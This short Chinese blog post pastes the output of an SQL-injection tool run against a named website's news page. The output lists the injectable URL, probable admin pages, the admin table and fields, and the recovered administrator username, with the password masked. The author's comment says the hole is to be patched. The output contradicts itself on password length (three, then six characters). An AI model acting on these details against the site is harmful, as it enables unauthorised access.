ASC获得的注入点链接:
http://www.skyhe.com/xxxxxx/news/oldnews.asp?CurPage=0
注入破解过程:
**********************************************************
存在漏洞,以数值型方式注入开始!
可能存在 http://www.skyhe.com/xxxxxx/news/chklogin.asp
可能存在 http://www.skyhe.com/xxxxxx/news/del.asp
存在表 admin
存在账号字段 name
存在密码字段 password
用户名长度为 6位
密码长度为 3位
账号第1位是 k
账号第2位是 i
账号第3位是 t
账号第4位是 t
账号第5位是 o
账号第6位是 w
管理员名为 kittow
密码第1位是 *
密码第2位是 *
密码第3位是 *
密码第4位是 *
密码第5位是 *
密码第6位是 *
管理员密码为:***********
所有检查完毕,请勿非法利用此结果信息!
**********************************************************
恐怖啊,不看不知道,一看吓一跳!
赶紧去把漏洞补上...-_-!
当前评分 2.5 , 共有 23 人参与
- Currently 2.478261/5 Stars.
- 1
- 2
- 3
- 4
- 5